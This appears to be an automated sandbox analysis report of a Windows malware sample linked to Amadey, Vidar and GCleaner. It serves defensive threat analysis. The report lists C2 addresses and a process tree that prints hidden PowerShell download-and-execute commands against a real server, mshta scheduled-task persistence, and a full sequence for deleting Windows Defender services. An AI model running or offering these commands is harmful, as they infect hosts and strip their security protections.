Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
24/03/2025, 07:54
General
-
Target
7af72d60902f6d9bd4ddb565cd4b0946.exe
-
Size
1.8MB
-
MD5
7af72d60902f6d9bd4ddb565cd4b0946
-
SHA1
9a81b3d5d58e5f5ad4719dcf4ff3f5c59aebbebc
-
SHA256
5e597a1b3b27fc614676bc331e7134bda14805ad4458d8649195aab33a102ae5
-
SHA512
d4429d47082bb917e84a031cf71fb62fdbf4c7b77febde69fee4188b21da2d97b00d3f02d25f08226124b84a7df030a6d00ffd1fc43df66a1554582f5b462c50
-
SSDEEP
49152:Sw+XuSlBp9q3mmc5+d8hJC6gPJ/ReTbdVM:pAuSl39q3mmc5+d8nNgFReTZV
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Amadey family
-
Detect Vidar Stealer 1 IoCs
-
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
-
Gcleaner family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
-
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 11 IoCs
-
Possible privilege escalation attempt 2 IoCs
-
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 23 IoCs
-
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 48 IoCs
-
Modifies file permissions 1 TTPs 2 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 46 IoCs
-
Drops file in Windows directory 8 IoCs
-
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 40 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Delays execution with timeout.exe 2 IoCs
-
Modifies Internet Explorer settings 1 TTPs 2 IoCs
-
Modifies system certificate store 2 TTPs 3 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 29 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
-
Suspicious use of FindShellTrayWindow 7 IoCs
-
Suspicious use of SendNotifyMessage 6 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\7af72d60902f6d9bd4ddb565cd4b0946.exe"C:\Users\Admin\AppData\Local\Temp\7af72d60902f6d9bd4ddb565cd4b0946.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\10313630101\cUpXaxB.exe"C:\Users\Admin\AppData\Local\Temp\10313630101\cUpXaxB.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\10314650101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10314650101\apple.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\ADEB.tmp\ADEC.tmp\ADED.bat C:\Users\Admin\AppData\Local\Temp\11.exe"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe" go7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AE78.tmp\AE79.tmp\AE7A.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"8⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc start ddrver9⤵
- Launches sc.exe
-
-
C:\Windows\system32\timeout.exetimeout /t 19⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\sc.exesc stop ddrver9⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc start ddrver9⤵
- Launches sc.exe
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y9⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t9⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f9⤵
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f9⤵
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f9⤵
-
-
C:\Windows\system32\sc.exesc stop "Sense"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "Sense"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f9⤵
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f9⤵
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f9⤵
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f9⤵
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f9⤵
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f9⤵
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f9⤵
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f9⤵
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f9⤵
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f9⤵
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f9⤵
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f9⤵
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"9⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f9⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f9⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f9⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f9⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f9⤵
-
-
C:\Windows\system32\sc.exesc stop ddrver9⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete ddrver9⤵
- Launches sc.exe
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10317340101\Jq0hGDZ.exe"C:\Users\Admin\AppData\Local\Temp\10317340101\Jq0hGDZ.exe"4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\10317930101\ab962500b4.exe"C:\Users\Admin\AppData\Local\Temp\10317930101\ab962500b4.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn V16xQmaUlQi /tr "mshta C:\Users\Admin\AppData\Local\Temp\lwd6oFx5T.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn V16xQmaUlQi /tr "mshta C:\Users\Admin\AppData\Local\Temp\lwd6oFx5T.hta" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\lwd6oFx5T.hta5⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'9XJX5TIBYRI8POWGRAZGEM48IGASZSC6.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp9XJX5TIBYRI8POWGRAZGEM48IGASZSC6.EXE"C:\Users\Admin\AppData\Local\Temp9XJX5TIBYRI8POWGRAZGEM48IGASZSC6.EXE"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10317940121\am_no.cmd" "4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "FKg4jmaEJlj" /tr "mshta \"C:\Temp\dnCgo7hYU.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\dnCgo7hYU.hta"5⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10318410101\OkH8IPF.exe"C:\Users\Admin\AppData\Local\Temp\10318410101\OkH8IPF.exe"4⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2816 -s 365⤵
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\10318420101\y0u3d_003.exe"C:\Users\Admin\AppData\Local\Temp\10318420101\y0u3d_003.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\10318430101\tK0oYx3.exe"C:\Users\Admin\AppData\Local\Temp\10318430101\tK0oYx3.exe"4⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2844 -s 365⤵
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\10318440101\zx4PJh6.exe"C:\Users\Admin\AppData\Local\Temp\10318440101\zx4PJh6.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"6⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"6⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4408246⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Architecture.wmv6⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Offensive" Inter6⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 440824\Organizations.com + Flexible + Damn + Hard + College + Corp + Cj + Boulevard + Drainage + Truth 440824\Organizations.com6⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Dancing.wmv + ..\Ka.wmv + ..\Bali.wmv + ..\Liability.wmv + ..\Lamps.wmv + ..\Electro.wmv + ..\Shakespeare.wmv + ..\Make.wmv + ..\Physiology.wmv + ..\Witness.wmv + ..\Submitting.wmv + ..\Bd.wmv h6⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\440824\Organizations.comOrganizations.com h6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 56⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10318450101\cUpXaxB.exe"C:\Users\Admin\AppData\Local\Temp\10318450101\cUpXaxB.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\10318460101\Jq0hGDZ.exe"C:\Users\Admin\AppData\Local\Temp\10318460101\Jq0hGDZ.exe"4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\10318550101\eb646ddb34.exe"C:\Users\Admin\AppData\Local\Temp\10318550101\eb646ddb34.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\10318560101\032a5abc0c.exe"C:\Users\Admin\AppData\Local\Temp\10318560101\032a5abc0c.exe"4⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2496 -s 365⤵
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\10318570101\61c6cff00e.exe"C:\Users\Admin\AppData\Local\Temp\10318570101\61c6cff00e.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10318570101\61c6cff00e.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Local\Temp\10318580101\b0cdaa23ea.exe"C:\Users\Admin\AppData\Local\Temp\10318580101\b0cdaa23ea.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10318580101\b0cdaa23ea.exe"5⤵
- Executes dropped EXE
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10313630101\cUpXaxB.exe"C:\Users\Admin\AppData\Local\Temp\10313630101\cUpXaxB.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
1Modify Registry
3Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
779B
MD539c8cd50176057af3728802964f92d49
SHA168fc10a10997d7ad00142fc0de393fe3500c8017
SHA256f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6
-
Filesize
71KB
MD583142242e97b8953c386f988aa694e4a
SHA1833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10
-
Filesize
344B
MD5a0bc8edd420404fbe7ad02d0122c7899
SHA185ed980fc2c96f3bffc241018266c74ce3ed7e6c
SHA25629fb1124f8c22253afe0e6e8cbd0a6609f93d142a1dbbba4d78fba3d0029f49b
SHA512f1cb9da19be52ef7a64546380ffb9469ed703d8c7bbf61d1f2ca77ec63276e6431a03a7b484a869a6abf0b582cf080e550ba639c262a1d56e06460a01fce921d
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
4.9MB
MD5c909efcf6df1f5cab49d335588709324
SHA143ace2539e76dd0aebec2ce54d4b2caae6938cd9
SHA256d749497d270374cba985b0b93c536684fc69d331a0725f69e2d3ff0e55b2fbc6
SHA51268c95d27f47eeac10e8500cd8809582b771ab6b1c97a33d615d8edad997a6ab538c3c9fbb5af7b01ebe414ddaeaf28c0f1da88b80fbcb0305e27c1763f7c971a
-
Filesize
327KB
MD5f0676528d1fc19da84c92fe256950bd7
SHA160064bc7b1f94c8a2ad24e31127e0b40aff40b30
SHA256493b897d1a54e3aa3f177b49b2529d07cdd791c6d693b6be2f9a4f1144b74a32
SHA512420af976406380e9d1f708f7fc01fc1b9f649f8b7ffaf6607e21c2e6a435880772b8cd7bbff6e76661ddb1fb0e63cba423a60d042d0bcf9aa79058cf2a9cb9d8
-
Filesize
1.7MB
MD5ac8bde872e0a5fad5b498eea445c814a
SHA1c70b5e4b7711ddd6f08c982e8411095b02b18e54
SHA2569dd44670063223ac111bc2bac73773d5d2aea27b74f20ded07fe3713edf30e81
SHA51236212baec6fba22891883435448e9a4ef68385c8fe9c902ccab654ff39be1f0947113eb44aa51f302136ff61b91d9e4a7e495b4da3312b8926d73abd74367d83
-
Filesize
7.5MB
MD5f391dc5c2a7d2b735e53d801978a3887
SHA1fcb208a6f821a1b6f58fb21cae278b4a43775165
SHA256613504a0c04be939c798897104cd1a139bc67b61921f41c7efb0cfb1e4f2cb89
SHA512b55e7f91238ae3a3ba5ae3d4f9eccf390136a40c7c7647cb8fc4b2af23985a20d049ab8e111607c217a8da3a8899673606829ca648049da05ade9c639c814260
-
Filesize
938KB
MD528ada99435823e5cfeb8a01904e70169
SHA1b9028ce2de59ad7d1bacae258f5c6207294856d1
SHA25653cc3d0cf9a2c445eb3670afe52feabb19cfac2a1deb5a5e93252bd5834387ba
SHA5120bbb3392d08b9887880921a17fc2d68e1ef21fdd813667fcf79489fb10a674f4e89f1e3c664662ee3d50f0d05cf9c736339cc0fc337b937913f66ecee3b9970c
-
Filesize
1KB
MD5cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1b0db8b540841091f32a91fd8b7abcd81d9632802
SHA2565e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5
-
Filesize
1.1MB
MD5b38cd06513a826e8976bb39c3e855f64
SHA179eef674168786ff0762cfdb88a9457f8b518ed5
SHA2562e0b126dd788c027ca69b01335d4a08da28987c3c4296a3523d947da3c12cdc2
SHA5126944ba859359f162e1fc5b2c2b14c7ab1fb9cf5c0a83d7d81d3de722344e8ae3efc300fe369a87d550645de93de4f02ed92c47718cce6fe834fdaa6b543730c9
-
Filesize
1.2MB
MD5398ab46e27982dfd2028bf42f4832fa8
